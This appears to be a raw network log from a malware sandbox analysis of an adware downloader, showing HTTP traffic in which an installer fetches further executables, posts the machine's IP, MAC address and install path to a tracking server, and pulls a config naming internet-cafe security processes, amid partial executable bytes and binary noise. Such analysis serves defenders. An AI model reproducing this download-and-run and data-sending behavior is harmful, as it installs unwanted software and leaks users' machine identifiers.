.f..s.RE...@.......0..#..(.C2.#."...%.B.....|/...?/F....P..>x.........@u<CqF3[\.L.@U..@u<CqF3....w..W...t.F8.x..ORd.C..W?.Cqr.G...jk.P......Q.B|......].|....~.{...././..`.....n...~.21.....w.Xb......|.lU...*.....=...W?.Cqr.=.!....tn..CuF..w......U.d.......|%....~.{..../.:qU.<#...}S.O.>.=.H]S7......-..../....$H^..>..b..b....M5.....t...R.R:.......{....\B..eTc....n..Rmfv...-.-.=..D!..\EQ.m..X.........Y.dN.{...r.Y!....9..0`...l..HJuo.#t.&...C.[....i..BH9.R.7.)......mf....j1.5.\....C.....x...W....D.G....W?.CqrN.K<5g..._\|...V..).&.........Ut.9Tp&...e....b1 .%..^.z..9W^.I.h...C.[....i..BH9...x.E.w...Bj2_...sY.q..M...B.......f.H>21.....w.......%.w...eo..$}?V_*d.X]..w.v..f#6........#......g(......BP...A......i...I...~.{..../...}..QbQ.U....'........=...W...3.z....9:..p..m..Q'G...fBQNgY". ..F...."..v.i....p. ..C|...|../1.k9..^......5n<.r...zh......0.9...J.y........e. q*.&

<<< skipped >>>

GET /%original file name%.exe/40.jpg HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: f.handanxinyuan.com

Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently

Date: Thu, 16 Oct 2014 23:15:50 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.2.17

Location: hXXp://t.mou99.com/gcld/01/index.html?agent_id=31&adid=829&game_id=10&rnd=0.134823

5..jint ..0..

GET /RhijzXa HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: t.cn

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Found

Location: hXXp://xn--vqq86xovy.xn--fiqs8s/2.ico

Content-Type: text/html;charset=UTF-8

Server: weibo

Content-Length: 219

Date: Thu, 16 Oct 2014 23:14:45 GMT

X-Varnish: 1243576352

Age: 0

Via: 1.1 varnish

Connection: keep-alive

<HTML>.<HEAD>.<TITLE>Moved Temporarily</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Moved Temporarily</H1>.The document has moved <A HREF="http://xn--vqq86xovy.xn--fiqs8s/2.ico">here</A>..</BODY>.</HTML>...

GET /Public/conf/open/1/5_1_0_2_3/10.jpg HTTP/1.1

Host: config.153624.com

Accept:

Referer: hXXp://VVV.kuping.cc/

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)

Range: bytes=0-

HTTP/1.1 206 Partial Content

Server: nginx

Date: Thu, 16 Oct 2014 23:15:24 GMT

Content-Type: image/jpeg

Content-Length: 631

Last-Modified: Wed, 20 Aug 2014 02:40:54 GMT

Connection: keep-alive

ETag: "53f40ab6-277"

Content-Range: bytes 0-630/631

GET /dudu/netbian_a_41763.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: down.qunasou.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 16 Oct 2014 23:14:52 GMT

Content-Type: application/octet-stream

Content-Length: 5021976

Last-Modified: Fri, 22 Aug 2014 03:07:24 GMT

Connection: keep-alive

ETag: "53f6b3ec-4ca118"

Accept-Ranges: bytes

MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........]eF.<...<...<..u3V..<... ...<.......<.......<...#...<...<...<...#...<...#...<..5 ...<...#...<...#...<.......<.......<...<...>..^#...<..q:...<..Rich.<..........PE..L......S.................P...p......6........`....@...................................M.....................................H...T.......D6..........P.L..............................................................`...............................text....B.......P.................. ..`.rdata.......`.......`..............@..@.data...T...........................@....rsrc...D6.......@..................@..@......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<< skipped >>>

POST /api/client_data_receive.php?Name=9377meiying&Channel=mgaz2&referer_param=01&Version=1.1.0.5&IP=192.168.1.129&MAC=00-0C-29-7C-CD-1F&Installtime=2014/10/16/21:11:31&ExeName=C:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm82.tmp\9377mycs_Y_mgaz2_01.exe HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.9377.com

Content-Length: 226

Connection: Keep-Alive

Cache-Control: no-cache

Name=9377meiying&Channel=mgaz2&referer_param=01&Version=1.1.0.5&IP=192.168.1.129&MAC=00-0C-29-7C-CD-1F&Installtime=2014/10/16/21:11:31&ExeName=%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\9377mycs_Y_mgaz2_01.exe

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 16 Oct 2014 23:15:43 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

135..Array.(. [Name] => 9377meiying. [Channel] => mgaz2. [referer_param] => 01. [Version] => 1.1.0.5. [IP] => 192.168.1.129. [MAC] => 00-0C-29-7C-CD-1F. [Installtime] => 2014/10/16/21:11:31. [ExeName] => %Documents and Settings%\adm\Local Settings\Temp\nsm82.tmp\9377mycs_Y_mgaz2_01.exe.)...0..

GET /20140928/9377mycs_Y_mgaz2_01.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: xiazai.9377.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 16 Oct 2014 11:45:18 GMT

Server: nginx

Content-Type: application/octet-stream

Content-Length: 1009903

Last-Modified: Sun, 28 Sep 2014 10:17:41 GMT

Accept-Ranges: bytes

Age: 1

X-Via: 1.1 zjjhdx31:88 (Cdn Cache Server V2.0), 1.1 dls20:10 (Cdn Cache Server V2.0)

Connection: keep-alive

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......p...2...........................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata...0...@...........................rsrc....2...p...4...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

GET /stat.php?id=5578506 HTTP/1.1

Accept: */*

Referer: hXXp://img.wallba.com/Public/Configs/dudu_cnzz/install_begin.html?id=41763

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s9.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Date: Thu, 16 Oct 2014 23:15:31 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Thu, 16 Oct 2014 23:15:31 GMT

Cache-Control: max-age=5400,s-maxage=5400

2758..(function(){function k(){this.c="5578506";this.R="z";this.N="";this.K="";this.M="";this.r="1413501331";this.P="hzs10.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=5578506");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c

<<< skipped >>>

GET /Public/conf/cybercafe_check/index.xml HTTP/1.1

Host: config.153624.com

Connection: keep-alive

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0

Accept-Encoding: deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 16 Oct 2014 23:15:27 GMT

Content-Type: text/xml

Content-Length: 633

Last-Modified: Wed, 24 Sep 2014 06:14:22 GMT

Connection: keep-alive

ETag: "5422613e-279"

Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>.<root>...<reg>...<item></item>...<item></item>..</reg>...<icon>...<item>............</item>...<item>.........</item>...<item>iKeeper</item>...<item>............</item>...<item>......</item>...<item>............</item>...</icon>...<process>...<item>ikeeper.exe</item>...<item>DbntCli.exe</item>...<item>.............exe</item>...<item>BarClientView.exe</item>...<item>lock.exe</item>...<item>BarMonitor.exe</item>...<item>DF5Serv.exe</item>...<item>PBSClient.exe</item>...<item>Clsmn.exe</item>..</process>.</root>..

GET /Public/conf/open/1/5_1_0_2_3/11.jpg HTTP/1.1

Host: config.153624.com

Accept:

Referer: hXXp://VVV.kuping.cc/

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)

Range: bytes=0-

HTTP/1.1 206 Partial Content

Server: nginx

Date: Thu, 16 Oct 2014 23:15:24 GMT

Content-Type: image/jpeg

Content-Length: 1059

Last-Modified: Fri, 12 Sep 2014 10:24:16 GMT

Connection: keep-alive

ETag: "5412c9d0-423"

Content-Range: bytes 0-1058/1059

......JFIF.....`.`.....C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...?...]y^....F../..v....}f ..73...t.b.).9g..^#"..20...DP.Aa..#.|)...xG...:..G....q~/...... S.3.'.dX......YNa..3>".e.V...3.8lB.U...N.....W.W..x...x........|8..C.Zra0ou....?...kI.......S..w'...;|..m.OGZ$....4.:t.5....A.......H..!.]..-.....o.*#.."@...%.kL.......g.Vf.f&..i.......1<b..#...x.......^.....Z.'.9........q.97...r,L....... .)c......g..3L6[..Z5.......7.7..!p.3...G.,7.....9...../.9w....d.a.V..]JXZyw....q...4...8......gxL...........

GET /9.gif?abc=1&rnd=1439782326 HTTP/1.1

Accept: */*

Referer: hXXp://img.wallba.com/Public/Configs/dudu_cnzz/install_begin.html?id=41763

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cnzz.mmstat.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Server: Tengine

Date: Thu, 16 Oct 2014 23:15:33 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=lT/HDA7RDG4CAbhrJibTNcK9; expires=Sun, 13-Oct-24 23:15:33 GMT; path=/; domain=.mmstat.com

Set-Cookie: sca=07cdce84; path=/; domain=.cnzz.mmstat.com

Set-Cookie: atpsida=9f32e6c0dd630c27f010c431_1413501333; expires=Sun, 13-Oct-24 23:15:33 GMT; path=/; domain=.cnzz.mmstat.com

Location: hXXp://pcookie.cnzz.com/app.gif?&cna=lT/HDA7RDG4CAbhrJibTNcK9

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

GIF89a.............!.......,...........L..;..

GET /iplookup/iplookup.php HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: int.dpool.sina.com.cn

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: U_TRS1=00000026.5e014d62.54405162.305d2914

HTTP/1.1 200 OK

Date: Thu, 16 Oct 2014 23:14:44 GMT

Server: Apache

Set-Cookie: U_TRS2=00000026.f6435e8a.54405164.dda840a0; path=/; domain=.sina.com.cn

Cache-Control: max-age=120

Expires: Thu, 16 Oct 2014 23:16:44 GMT

DPOOL_HEADER: 10.13.32.99

Content-Length: 26

Connection: close

Content-Type: text/html; charset=GBK

SINA-LB:aGEuMzcuZzEuYngubGIuc2luYW5vZGUuY29t

SINA-TS:OTJjMmRlY2UgMCAwIDAgNSAwCg==

1.-1.-1.....................

GET /Public/conf/homepage/2/5_1_0_2_3/41763.xml HTTP/1.1

Host: config.153624.com

Connection: keep-alive

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0

Accept-Encoding: deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 16 Oct 2014 23:15:28 GMT

Content-Type: text/xml

Content-Length: 1272

Last-Modified: Thu, 16 Oct 2014 10:06:33 GMT

Connection: keep-alive

ETag: "543f98a9-4f8"

Accept-Ranges: bytes

..._..O.K......&.......y.....{.".......g.........<..w .L3r\.5...i....6....[|..X..5_.K...............A.V.NU.........O;....JS.................7..W...x."......Q........=1=K...$.ZL.lH,g_.F....?..G..Z..h.L@;.b.x.A....Ik.OK...$.ZL.lH,g_.F.-d...{BK...$.ZL...%pwX..{.,...F.x........qY...........d...w9...4.h.......IT....4..._O.....:.OTO.a..m...T%...D!;...n..... ..|..a......8..?.....l.1..9.9.k$$..%.>.QKu.W.4.n..r....NN..V{..c$.....|.e.y5.;....;..(....M.}2.w..- ....g..8S.......S......P. MT..UN,...=..N.~.....z./S.Ia..[..H.1&W.....k..l.7........8....a.7........m .!L,....F...........<.=...k.sG1 ....=.9....k=._....FU.E.......N..?.2..x....^0..Q...[.T.S..X....&......U .....89.?:..M.5.. .f...Sg ....m..l1.....nE...@...n!>..b./*....D..:9..>)...F.0n)........ .V.#.V..........<..D....I.SW..........$..TiE........[i6........~vir.ci6......O...'.`...{....&m..N..=JH.@?......_..4..U../.lb...-...G....C.].Gm."^.j...ZT..N..Cb..0m:...I./..3.b..,TzDC..:.p-../..iJv.....X.-..~...=O.y.v1..Q*..?...H..K. v.W ....6..o...".i.q.0....Tz|=R|.w....he0zi..........J!........O.'.........`..dM....9T...rG.m.....C.!f'.....m.....C.Jz.....#.............3m:2/....dQ.<.S....3...3.=...l..3b....GH.~..X]..w.v..f#6...6..6.fPw.|d..p4'...s.Z...7.....<..<6/.....e=j...C...ME.ey.....[.>.Pr"k..L.J.k...#.y..~m.(.A.}.....

GET /client/20140916/sdins/F0916_s_30911.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: dl1sw.baidu.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.0 200 OK

Expires: Wed, 29 Oct 2014 17:41:45 GMT

Date: Mon, 29 Sep 2014 17:41:45 GMT

Server: nginx

Content-Type: application/octet-stream

Content-Length: 12272944

Last-Modified: Tue, 16 Sep 2014 09:40:10 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Age: 1488848

Via: 1.0 tswt83:8104 (Cdn Cache Server V2.0), 1.0 shiben11:8888 (Cdn Cache Server V2.0)

Connection: close

Content-Disposition: attachment;filename="F0916_s_30911.exe"

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD

MZ......................@.................D.e!..........................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................p.......B...9............@...........................&......$;*..@.................................d.........$..h...........!..H#...........................................................................................text....o.......p.................. ..`.rdata...*.......,...t..............@..@.data....~..........................@....ndata...P...0...........................rsrc....h....$..j..................@..@.reloc........%.....................@..B.................................................................................................................................................................................................................h..@.j..$...S.....j........j#.......WVh..@..E..x=.....V..=....u.Sj..1*...m....E.V.E..E.......:..3.Wf.LF...:..3.f.LG..E.f.M.PS.u..}..E.f.M...)...E.P....@...........................G......h..@....@.V.]..]..]..>:..V..0A.W.2:..9].t.S......E.9].t.j.......E.9].t.j"......E.j........SWVh..@.h..@...<.....S.u..u..u...@.@..t......@..E....@.j..E......j........j........Ph. ..V.E.PSW..D.@..E.PV....@......Q.8;..Y.E.9].uDj..Z.....;.......j3.R.....VW....@.Vh.0A..u..E.hP.@...;.....W....@..<j".......V.u.h$.@...;...E....;.u....G.......M....QVP......E.9]...h........;.t......=..G........E..E..E.j..E......j..E......W.E..g:..YS.E..E.P.

<<< skipped >>>

GET /open/setup_3386.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: down.yinyue.fm

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.0 200 OK

Content-Type: application/octet-stream

Content-Length: 3883832

Last-Modified: Thu, 16 Oct 2014 22:35:35 GMT

Accept-Ranges: bytes

Date: Thu, 16 Oct 2014 23:15:16 GMT

ETag: "54404837-3b4338"

Connection: keep-alive

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.{Y i.. i.. i...'..*i..0...3i..0...Xi..0....i.."...(i.."...2i.. i...i..0... i..0...*i..0...*i..Rich i..........PE..L....:*T.................D....9.....x........`....@...........................;......P;...@.................................$............99..........0;.8....@;......b..............................h...@............`...............................text....B.......D.................. ..`.rdata..bY...`...Z...H..............@..@.data....0..........................@....rsrc....99......:9.................@..@.reloc...A...@;..B....:.............@..B................................................................................................................................................................................................................................................................................................................................................U..j.h_QA.d.....P..|.$.A.3..E.SVWP.E.d.........|.....@.A.3..u..{8.G.....A..C...A..C...A..C...A..C.(.A..C...C0....f.s4.C6.............A..s|.M.......E...E.P........................$aA...M...U...E.Q..M.R..U.PQRh<.A..w".....S.....h..... }......E..E..;.t.P..%....3..u..C|......u.......E..M.;.t.P.z......3.P.U..E..E..E.R.C.P.E........bA....M.d......Y_^[.M.3..)z....]........U..j.h.PA.d.....P.......$.A.3..E.SVWP.E.d......E...$...j.Q..8.....{..P.%z........j#..hP.A.P............................A#.ht.A........E......

<<< skipped >>>

GET /Public/Configs/dudu_cnzz/install_begin.html?id=41763 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: img.wallba.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: DnionOS/1.2.1

Date: Tue, 14 Oct 2014 08:49:01 GMT

Content-Type: text/html

Content-Length: 318

Last-Modified: Thu, 20 Mar 2014 03:38:35 GMT

ETag: "532a62bb-13e"

Accept-Ranges: bytes

Age: 225113

Via: ZJHZ-108-225.fastcdn.com (DLC-3.0), gxnn_187_206 (DLC-3.0)

Connection: keep-alive

Warning: 113 DLC-3.0

Map

Strings from Dumps